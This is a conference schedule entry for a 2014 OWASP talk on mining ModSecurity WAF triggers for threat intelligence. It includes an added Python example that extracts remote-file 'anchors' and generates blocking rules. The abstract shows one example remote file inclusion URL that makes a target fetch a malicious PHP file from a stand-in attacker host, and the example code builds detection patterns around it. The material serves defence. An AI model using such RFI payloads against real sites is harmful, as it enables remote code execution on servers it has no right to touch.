Welcome to the full schedule of the OWASP AppSec Research EU 2014 conference days


Wednesday, June 25

15:55 BST

Getting New Actionable Insights by Analyzing Web Application Firewall Triggers
The ModSecurity Web Application Firewall was first released more than a decade ago as open source software for protecting web applications. Over the years ModSecurity has matured significantly and is now the most widely deployed WAF, protecting millions of websites. Alongside the ModSecurity engine we can also find the OWASP ModSecurity Core Rule Set (CRS), a library of generic application security signatures that provides a base level of protection for any web application.

In this presentation I will show an advanced technique for post-processing ModSecurity Core Rule Set WAF triggers in order to derive actionable defenses from them. The objective of the post-processing is to improve security controls: from the collected malicious HTTP traffic we can produce new insights into our attackers and the techniques they use, and as a result harden our defenses and improve our mitigations.

The presentation will include a detailed description of several techniques, with case studies based on real traffic from Akamai's security big data platform (Cloud Security Intelligence).

Example of analysis of a remote file inclusion attack:

When analyzing the payload of a remote file inclusion (RFI) attack we will find a link to a remote source code file that the attackers are trying to inject into the vulnerable application. In many cases the injected remote file is a static "anchor" in a continuous attack campaign that exploits various RFI vulnerabilities with the same remote file.

Generating a signature that matches attacks based on this attack "anchor" can improve the detection capabilities of ModSecurity CRS and at the same time give better insight into the threat landscape. More than that, the "anchor" can be used as enrichment for other security controls that monitor URL and domain reputation.

RFI attack:

http://www.target.com/vuln_page.php?file=http://www.attacker.com/malicous.php

In the attack above we can see the remote source file located at “www.attacker.com/malicous.php”. This malicious file reference can be valuable when:

  • Looking for the same link in HTTP traffic (complementary to the ModSecurity CRS rules)
  • Blocking traffic from within the organization to the attacker's web application
  • Correlating similar attacks as the same distributed attack campaign

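As an added illustration of the post-processing the abstract describes (example code, not from the talk or from Akamai's platform): it extracts the remote-file "anchor" from a constructed set of CRS RFI trigger records, correlates the triggers that share an anchor into one campaign, and renders an illustrative ModSecurity rule for each anchor seen against several hosts. The record layout, host names, IPs and rule ids are assumptions of the example.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample of CRS RFI triggers reduced to (source IP, attacked host, request URI).
# This tuple layout is an assumption of the example, not ModSecurity's audit-log format.
TRIGGERS = [
    ("198.51.100.7", "shop.example", "/vuln_page.php?file=http://www.attacker.example/malicous.php"),
    ("203.0.113.9", "blog.example", "/index.php?page=HTTP://WWW.ATTACKER.EXAMPLE/malicous.php?"),
    ("203.0.113.9", "shop.example", "/vuln_page.php?file=http://other.example/shell.txt"),
    ("198.51.100.7", "wiki.example", "/view.php?tpl=http://www.attacker.example:80/malicous.php"),
    ("192.0.2.4", "shop.example", "/vuln_page.php?file=about.php"),  # local include: no remote anchor
]

REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

def extract_anchor(request_uri):
    """Return the normalised remote-file anchor (host/path) from an RFI payload, or None."""
    for _, value in parse_qsl(urlsplit(request_uri).query, keep_blank_values=True):
        if REMOTE_URL.match(value):
            # Drop case, port and trailing query so variants of one remote file collapse together.
            remote = urlsplit(value.lower())
            return f"{remote.hostname or ''}{remote.path or '/'}"
    return None

def correlate_campaigns(triggers):
    """Group triggers by anchor: hit count, attacking IPs and attacked hosts per remote file."""
    campaigns = defaultdict(lambda: {"hits": 0, "sources": set(), "targets": set()})
    for src_ip, target_host, uri in triggers:
        anchor = extract_anchor(uri)
        if anchor is None:
            continue  # not an RFI with a remote anchor (e.g. a local file include)
        entry = campaigns[anchor]
        entry["hits"] += 1
        entry["sources"].add(src_ip)
        entry["targets"].add(target_host)
    return dict(campaigns)

def campaign_anchors(campaigns, min_targets=2):
    """Anchors reused against several distinct hosts: the signal for one distributed campaign."""
    return sorted(a for a, e in campaigns.items() if len(e["targets"]) >= min_targets)

def anchor_rule(anchor, rule_id):
    """Render an illustrative ModSecurity rule that matches the anchor (with or without a port)."""
    host, _, path = anchor.partition("/")
    pattern = re.escape(host) + r"(?::\d+)?/" + re.escape(path)
    return (f'SecRule ARGS "@rx {pattern}" '
            f'"id:{rule_id},phase:2,deny,log,t:lowercase,msg:\'RFI anchor {anchor}\'"')
```

The same anchor can feed the second and third bullets above directly: the host part goes to an egress blocklist, and the per-anchor source and target sets show which attacking IPs and victim hosts belong to one campaign.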

Speakers

Or Katz

Principal Lead, Security Researcher, Akamai
Or Katz is a security veteran with years of experience at industry-leading vendors; he currently serves as Principal Lead Security Researcher for Akamai. Katz is a frequent speaker at security conferences and has published several articles and white papers on threat intelligence and defensive...


Wednesday June 25, 2014 15:55 - 16:45 BST
LAB003